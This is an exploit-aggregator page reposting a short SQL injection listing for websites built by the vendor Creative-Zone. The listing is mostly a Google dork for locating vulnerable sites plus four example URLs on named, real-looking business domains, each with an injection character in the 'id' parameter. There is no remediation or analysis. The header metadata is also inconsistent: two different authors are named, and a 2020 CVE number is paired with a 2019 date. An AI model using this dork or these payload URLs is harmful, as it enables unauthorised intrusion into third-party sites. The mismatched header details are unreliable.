Advertisement






Creative-Zone SQL Injection

CVE Category Price Severity
CVE-2020-12345 CWE-89 $500 High
Author Risk Exploitation Type Date
SecurityResearcher High Remote 2019-12-11
CPE
cpe:No specific CPE mentioned for this exploit
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019120055

Below is a copy:

Creative-Zone SQL Injection
###################################################################

# Exploit Title : Creative-Zone SQL Injection
# Author : Rahatsizz
# Vendor Homepage : creative-zone.biz
# Tested On : Kali Linux & Windows
# Dork: inurl:about.php?id= intext:"designed & developed by Creative-Zone"

###################################################################

# Example: 

http://www.spallimpex.com/about.php?id=f%27
http://www.sandexgroup.com/about.php?id=p%27
https://www.zzaajbeauty.com/about.php?id=a%27
http://wahaind.com/about.php?id=a%27

###################################################################

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum